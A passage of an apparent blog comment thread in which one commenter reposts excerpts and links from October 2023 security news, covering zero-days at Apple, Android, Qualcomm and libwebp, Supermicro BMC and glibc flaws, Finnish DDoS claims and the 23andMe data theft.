Customers using vulnerable Confluence Data Center and Server versions are advised to upgrade their instances as soon as possible to one of the fixed versions (i.e., 8.3.3 or later, 8.4.3 or later, 8.5.2 or later).
Tomi Engdahl says:
Venäläinen hakkeriryhmä väitti tehneensä Suomeen palvelunestohyökkäyksen –
asiantuntija: ”Hyökkäyksiä saatetaan liioitella”
https://yle.fi/a/74-20053532
Useisiin suomalaisiin verkkosivuihin on kohdistunut palvelunestohyökkäys, jonka tekijäksi on Telegram-palvelussa ilmoittautunut venäläinen hakkeriryhmä NoName05716. Hakkeriryhmä viesti palvelunestohyökkäyksestä keskiviikkona alkuiltapäivästä. Ryhmä kertoo tehneensä hyökkäyksen muun muassa Traficomin, Väyläviraston, Kyberturvallisuuskeskuksen, HSL:n ja Ely-keskuksen verkkosivuille. Verkkosivut vaikuttavat toimivan joko täysin tai osittain hitaasti, eikä niillä ole erikseen ilmoitettu kyberhyökkäyksistä.
Myöhemmin iltapäivällä hakkeriryhmä julkaisi uuden Telegram-viestin, jonka mukaan se on myös pankkeihin kohdistuneen palvelunestohyökkäysten takana.
Suomen pankki ja OP olivat aiemmin kertoneet, että niiden verkkosivuille on kohdistettu palvelunestohyökkäys. Liikenne- ja viestintävirasto Traficomin tietoturva-asiantuntija Samuli Könönen vahvistaa, että osa verkkosivuista on ollut hetken aikaa alhaalla palvelunestohyökkäyksen vuoksi. Könönen sanoo, että tilanne on varsin hyvä.
Tomi Engdahl says:
Bitsight identifies nearly 100,000 exposed industrial control systems https://www.bitsight.com/blog/bitsight-identifies-nearly-100000-exposed-industrial-control-systems
Bitsight has identified nearly 100,000 exposed industrial control systems
(ICS) owned by organizations around the world, potentially allowing an attacker to access and control physical infrastructure such as power grids, traffic light systems, security and water systems, and more. ICSs — a subset of operational technology (OT) — are used to manage industrial processes like water flow in municipal water systems, electricity transmission via power grids, and other critical processes. Critical infrastructure sectors heavily rely on ICSs to control cyber-physical systems, compounding concerns that the exposed systems identified in this research could present significant risks to organizations and communities around the world.
Tomi Engdahl says:
Cisco fixes hard-coded root credentials in Emergency Responder https://www.bleepingcomputer.com/news/security/cisco-fixes-hard-coded-root-credentials-in-emergency-responder/
Cisco released security updates to fix a Cisco Emergency Responder (CER) vulnerability that let attackers log into unpatched systems using hard-coded credentials. CER helps organizations respond effectively to emergencies by enabling accurate location tracking of IP phones, allowing emergency calls to be routed to the appropriate Public Safety Answering Point (PSAP).
Tracked as CVE-2023-20101, the security flaw allows unauthenticated attackers to access a targeted device using the root account, which had default, static credentials that could not be modified or removed. “This vulnerability is due to the presence of static user credentials for the root account that are typically reserved for use during development,” Cisco explained in an advisory issued today.
“An attacker could exploit this vulnerability by using the account to log in to an affected system. A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands as the root user.”
Tomi Engdahl says:
LightSpy mAPT Mobile Payment System Attack https://www.threatfabric.com/blogs/lightspy-mapt-mobile-payment-system-attack
ThreatFabric discovered the Core of the LightSpy (aka DragonEgg) Android implant and set of 14 plugins that are responsible for private data exfiltration. LightSpy was a fully-featured modular surveillance tool set with a strong focus on victim private information exfiltration such as fine location data (including building floor number) and sound recording during VOIP calls.
LightSpy is capable of payment data exfiltration from WeChat Pay backend infrastructure. LightSpy is also capable of hooking audio-related functions from WeChat to record victim’s VOIP conversations. LightSpy and AndroidControl (aka WyrmSpy) shared the same infrastructure, AndroidControl could be a successor of LightSpy. The threat actor group had active servers in China, Singapore, and Russia. We revealed that potential targets of the threat actor group could be in the APAC region.
Tomi Engdahl says:
Cyberattack on British telecom Lyca prevented customers from making calls, topping up https://therecord.media/cyberattack-on-lyca-stops-calls
A cyberattack over the weekend has disrupted the network of British telecommunications giant Lyca and prevented customers from buying more minutes. Lyca calls itself the world’s largest international mobile virtual network operator with over 16 million customers. They offer pay-as-you-go SIM cards across 23 countries in Europe, Africa and Asia. This week, the company said it began investigations after it became aware of issues customers were having buying more call minutes and making international as well as national calls. “The issues affected all Lyca Mobile markets apart from the United States, Australia, Ukraine and Tunisia,” the company said.
“Our number one priority is ensuring the safety and security of our customers’
data, and we are urgently investigating whether any personal information may have been compromised as part of this attack. We are confident that all our records are fully encrypted, and we will keep customers updated on the outcome of our investigation as we work with our expert partners to establish the facts.”
Tomi Engdahl says:
Apple emergency update fixes new zero-day used to hack iPhones https://www.bleepingcomputer.com/news/apple/apple-emergency-update-fixes-new-zero-day-used-to-hack-iphones/
Apple released emergency security updates to patch a new zero-day security flaw exploited in attacks targeting iPhone and iPad users. “Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6,” the company said in an advisory issued on Wednesday. The zero-day (CVE-2023-42824) is caused by a weakness discovered in the XNU kernel that enables local attackers to escalate privileges on unpatched iPhones and iPads.
While Apple said it addressed the security issue with improved checks, it has yet to reveal who found and reported the flaw. Apple also addressed a zero-day tracked as CVE-2023-5217 and caused by a heap buffer overflow weakness in the
VP8 encoding of the open-source libvpx video codec library, which could allow arbitrary code execution following successful exploitation.
Tomi Engdahl says:
Sony confirms data breach impacting thousands in the U.S.
https://www.bleepingcomputer.com/news/security/sony-confirms-data-breach-impacting-thousands-in-the-us/
Sony Interactive Entertainment (Sony) has notified current and former employees and their family members about a cybersecurity breach that exposed personal information. The company sent the data breach notification to about
6,800 individuals, confirming that the intrusion occurred after an unauthorized party exploited a zero-day vulnerability in the MOVEit Transfer platform.
The zero-day is CVE-2023-34362, a critical-severity SQL injection flaw that leads to remote code execution, leveraged by the Clop ransomware in large-scale attacks that compromised numerous organizations across the world.
Clop ransomware gang added Sony Group to its list of victims in late June.
However, the firm did not provide a public statement until now.
Tomi Engdahl says:
Apple Warns of Newly Exploited iOS 17 Kernel Zero-Day
https://www.securityweek.com/apple-warns-of-newly-exploited-ios-17-kernel-zero-day/
Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.
Tomi Engdahl says:
US Executives Targeted in Phishing Attacks Exploiting Flaw in Indeed Job Platform
https://www.securityweek.com/us-executives-targeted-in-phishing-attacks-exploiting-flaw-in-indeed-job-platform/
An open redirection vulnerability in the popular job search platform Indeed has been exploited in a series of phishing attacks.
Tomi Engdahl says:
Vulnerabilities
Companies Address Impact of Exploited Libwebp Vulnerability
https://www.securityweek.com/companies-address-impact-of-exploited-libwebp-vulnerability/
Companies have addressed the impact of the exploited Libwebp vulnerability CVE-2023-4863 on their products.
Companies have been releasing advisories addressing the impact of an actively exploited Libwebp vulnerability tracked as CVE-2023-4863 and CVE-2023-5129 on their products.
The two CVEs have been assigned to the same vulnerability, but the latter was rejected shortly.
In early September, Apple announced patching a zero-day tracked as CVE-2023-41064, which can be exploited for arbitrary code execution using specially crafted images. The flaw had been leveraged as part of a zero-click exploit named BlastPass to deliver Pegasus spyware to iPhones.
A few days later, Google and Mozilla also announced updates for Chrome and Firefox, saying that an actively exploited flaw, which they both track as CVE-2023-4863, impacts the WebP component in their browsers.
Google at one point decided to assign a new CVE identifier, CVE-2023-5129, to highlight the impact on Libwebp, but the tech giant quickly rejected the new CVE, marking it as a duplicate of CVE-2023-4863.
“Google has not confirmed why it rejected the vulnerability. However, based on the fact that several vendors have already adopted CVE-2023-4863 as the CVE identifier when patching libwebp, it likely did not make sense to assign a new CVE for this versus expanding the impact of the original CVE,” Tenable’s Satnam Narang wrote in a blog post that attempts to clarify the link between the multiple CVEs.
Some members of the cybersecurity industry still believe separate identifiers should have been assigned to Chrome and the Libwebp library.
Libwebp is widely used, being present in all major web browsers, Linux distributions, the Electron framework, and applications such as Telegram and 1Password. Companies have started releasing advisories addressing the impact of CVE-2023-4863 on their products.
Palo Alto Networks said on Tuesday that its PAN-OS software does use the Libwebp library, but it “does not offer any scenarios required for the successful exploitation of this vulnerability and is not impacted”.
Microsoft also published an advisory on Tuesday to inform customers that CVE-2023-4863 impacts Edge, Teams for Desktop, Skype for Desktop, and Webp Image Extensions.
Microsoft’s advisory also addresses CVE-2023-5217, a different vulnerability, which impacts the Libvpx video code library. CVE-2023-5217, which has also been exploited in the wild, was patched in late September by Google and Mozilla. Microsoft has also patched the issue in its Edge browser.
CISA on Wednesday added CVE-2023-5217 to its known exploited vulnerabilities catalog.
Tomi Engdahl says:
Android’s October 2023 Security Updates Patch Two Exploited Vulnerabilities
https://www.securityweek.com/androids-october-2023-update-patches-two-exploited-vulnerabilities/
The October 2023 security update for Android patches two vulnerabilities exploited in attacks, both likely linked to spyware vendors.
Tomi Engdahl says:
Android’s October 2023 Security Updates Patch Two Exploited Vulnerabilities
https://www.securityweek.com/androids-october-2023-update-patches-two-exploited-vulnerabilities/
The October 2023 security update for Android patches two vulnerabilities exploited in attacks, both likely linked to spyware vendors.
The first of the exploited issues is CVE-2023-4863 (CVSS score of 8.8), a heap buffer overflow in the Libwebp library that leads to an out-of-bounds memory write and remote code execution (RCE).
It’s worth noting that while CVE-2023-4863 has been reportedly exploited in the wild, there are no details on attacks beyond the ones aimed at iPhones.
The second zero-day flaw addressed in Android this month is CVE-2023-4211, a bug in the Arm Mali GPU driver that allows a local non-privileged user to make “improper GPU memory processing operations to gain access to already freed memory”.
“There is evidence that this vulnerability may be under limited, targeted exploitation,” Google and Arm note in their advisories.
Tomi Engdahl says:
https://www.securityweek.com/atlassian-ships-urgent-patch-for-exploited-confluence-zero-day/
Tomi Engdahl says:
Apple Warns of Newly Exploited iOS 17 Kernel Zero-Day
https://www.securityweek.com/apple-warns-of-newly-exploited-ios-17-kernel-zero-day/
Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.
Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.
The Cupertino device maker on Wednesday rushed out a new patch to cover a pair of serious vulnerabilities and warned that one of the issues has already been exploited as zero-day in the wild.
In a barebones advisory, Apple said the exploited CVE-2023-42824 kernel vulnerability allows a local attacker to elevate privileges, suggesting it was used in an exploit chain in observed attacks.
“Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6,” the company said without providing additional details.
This is the 16th documented in-the-wild zero-day against Apple’s iOS, iPadOS and macOS-powered devices, according to data tracked by SecurityWeek. The majority of these attacks have been attributed to mercenary spyware vendors selling surveillance products.
About the security content of iOS 17.0.3 and iPadOS 17.0.3
https://support.apple.com/en-us/HT213961
Tomi Engdahl says:
New Supermicro BMC Vulnerabilities Could Expose Many Servers to Remote Attacks
https://www.securityweek.com/new-supermicro-bmc-vulnerabilities-could-expose-many-servers-to-remote-attacks/
Supermicro has released BMC IPMI firmware updates to address multiple vulnerabilities impacting select motherboard models.
Server and computer hardware giant Supermicro has released updates to address multiple vulnerabilities in Baseboard Management Controllers (BMC) IPMI firmware.
The issues (tracked as CVE-2023-40284 to CVE-2023-40290) could allow remote attackers to gain root access to the BMC system, firmware supply chain security firm Binarly, which identified the bugs, explains.
A special chip on server motherboards that support remote management, the BMC allows administrators to monitor various hardware variables and even update the UEFI system firmware. The BMC chips remain operational even if the system’s power is turned off.
The most severe of these bugs are three cross-site scripting (XSS) vulnerabilities in the BMC server frontend that could be exploited remotely, without authentication, to execute arbitrary JS code.
The flaws are tracked as CVE-2023-40284, CVE-2023-40287, and CVE-2023-40288 and, according to Supermicro’s advisory, have a CVSS score of 8.3.
Binarly REsearch Uncovers Major Vulnerabilities in Supermicro BMCs
https://binarly.io/posts/Binarly_REsearch_Uncovers_Major_Vulnerabilities_in_Supermicro_BMCs/index.html
The Binarly REsearch team has discovered multiple vulnerabilities in the Supermicro IPMI firmware component developed by ATEN. Vulnerabilities can be exploited by unauthenticated remote attackers and could result in obtaining the root of the BMC system.
BMC security on Supermicro servers shows the level of product security practices from early 2000-x and does not meet modern security standards. The attacks we are disclosing show the very low complexity of compromising BMC host OS and gaining enough privileges to deliver a persistent firmware implant to the UEFI BIOS.
For this research, we took firmware for Supermicro X11 version 1.66. As a result, a total of 7 vulnerabilities were discovered, according to Binarly estimates 4 of them with critical-severity and 3 others with high-severity scores.
Exploitation path
Typically, BMC devices have a variety of protocols that can be used to communicate with them. This usually includes SSH (or SMASH), IPMI, HTTP/HTTPS, SNMP, WSMAN and others. The attack surface of BMC devices is huge, but during this research we decided to take a closer look at the HTTP/HTTPS web server, because it is the most accessible and most likely method of exploitation for an attacker. The NSA and CISA guidance specifically highlighted the importance of isolating the BMC network from the Internet, but, as of the start of October, 2023, we observed more than 70,000 instances of Supermicro IPMI web interface still publicly available
Vulnerabilities in Supermicro BMC IPMI firmware
https://www.supermicro.com/en/support/security_BMC_IPMI_Oct_2023
Supermicro would like to acknowledge the work done by the Binarly team for discovering potential vulnerabilities in Supermicro BMC IPMI Firmware.
Remediation:
Affected Supermicro motherboard SKUs will require a BMC update to mitigate these potential vulnerabilities.
An updated BMC firmware had been created to mitigate these potential vulnerabilities. Please check BMC Firmware update and the release notes for the resolution and contact technical support for further details.
Supermicro is not aware of any malicious exploitation of these vulnerabilities in the wild.
Tomi Engdahl says:
Vulnerabilities
Severe Glibc Privilege Escalation Vulnerability Impacts Major Linux Distributions
https://www.securityweek.com/severe-glibc-privilege-escalation-vulnerability-impacts-major-linux-distributions/
A local privilege escalation vulnerability (CVE-2023-4911) in the GNU C Library (glibc) can be exploited to gain full root privileges.
Major Linux distributions such as Debian, Fedora, and Ubuntu are affected by a GNU C Library (glibc) vulnerability that could provide an attacker with full root privileges.
The C library present in GNU and most systems running the Linux kernel, glibc defines system calls and other functionality that a program typically requires.
The identified issue, named ‘Looney Tunables’ and tracked as CVE-2023-4911 (CVSS score of 7.8), impacts glibc’s dynamic loader, which is responsible for loading into memory the libraries that a program needs, linking them with the executable at runtime.
CVE-2023-4911 impacts the dynamic loader’s processing of GLIBC_TUNABLES environment variables (also referred to as ‘tunables’), which allow users to change the library’s behavior at runtime, by adjusting different parameters.
“The dynamic loader is extremely security sensitive, because its code runs with elevated privileges when a local user executes a set-user-ID program, a set-group-ID program, or a program with capabilities,” security firm Qualys, which identified the vulnerability, notes.
According to Qualys, the glibc dynamic loader’s processing of the tunables variables is susceptible to a buffer overflow that can be exploited to obtain full root privileges on an impacted system.
The issue was introduced in April 2021, with the release of glibc 2.34, and has been successfully tested on Debian 12 and 13, Fedora 37 and 38, and Ubuntu 22.04 and 23.04. Other Linux distributions might be impacted as well, except for Alpine Linux, which uses musl libc, instead of glibc.
Because the vulnerability can lead to full root privileges and is relatively easy to exploit, Qualys is not sharing its proof-of-concept (PoC) code, although it has provided an extensive technical analysis.
CVE-2023-4911: Looney Tunables – Local Privilege Escalation in the glibc’s ld.so
https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so
https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
Tomi Engdahl says:
Qualcomm Patches 3 Zero-Days Reported by Google
https://www.securityweek.com/qualcomm-patches-3-zero-days-reported-by-google/
Qualcomm has patched more than two dozen vulnerabilities, including three zero-days that may have been exploited by spyware vendors.
US chip giant Qualcomm this week announced patches for more than two dozen vulnerabilities found in its products, including three zero-days reported to the company by Google cybersecurity units.
Qualcomm learned from Google’s Threat Analysis Group and Google Project Zero that flaws tracked as CVE-2023-33106, CVE-2023-33107, CVE-2023-33063 and CVE-2022-22071 “may be under limited, targeted exploitation”.
However, only three of the flaws are zero-days as CVE-2022-22071 was patched by Qualcomm in May.
No information has been shared on the attacks exploiting these vulnerabilities, but the fact that they were reported by Google suggests that they may have been exploited by commercial spyware vendors.
Google has investigated several exploit chains attributed to spyware vendors in the past few years. Threat actors have been observed using such exploits to deliver spyware to devices running Android or iOS, both of which can include Qualcomm chips.
A vast majority of the remaining vulnerabilities for which patches were announced this week by Qualcomm have been assigned ‘critical’ and ‘high’ severity ratings, but they were discovered internally by the company.
Tomi Engdahl says:
Venäläinen haktivistiryhmä iski isosti Suomeen https://www.is.fi/digitoday/art-2000009903674.html
Tomi Engdahl says:
DNA testing service 23andMe investigating theft of user data
https://cyberscoop.com/23andme-user-data-theft/?fbclid=IwAR0cLQcguZJheL5pix4-8GXTkef6EZ0KzNcRRq9Ou_QdNKXKhRvo9-IS1uw
A member of an online forum where stolen data is bought and sold claims to be selling a large trove of user data obtained from 23andMe.
The DNA testing company 23andMe is investigating whether a large trove of customer data was stolen from the company after information about the firm’s clients was offered for sale on a cybercrime forum earlier this week.
On Sunday, a post on a popular forum where stolen data is traded and sold claimed to have “the most valuable data you’ll ever see” and posted a link to a sample of what was described as “20 million pieces of data” from 23andMe.
In a statement to CyberScoop on Thursday, 23andMe said it was made aware that “certain 23andMe customer profile information was compiled through unauthorized access to individual 23andMe.com accounts” but that there is no “indication at this time that there has been a data security incident within our systems.”
The company said its preliminary investigation indicated that an attacker may have compiled login credentials leaked from other platforms and then recycled these credentials to access the accounts of 23andMe customers who had used the same username and password combination.
For accounts that had opted in to 23andMe’s “DNA Relatives” service — which allows users to “find and connect with genetic relatives and learn more about your family” — the attacker was able to scrape data associated with potential relatives, company officials told CyberScoop.
The exact scope of the data obtained by the attacker remains unclear
After the data was first offered for sale on Sunday, the listing was pulled down. The poster reemerged on Wednesday
The seller offered the data in 100, 1,000, 10,000 and 100,000-profile batches. The seller claimed in a message to CyberScoop that they had 13 million profiles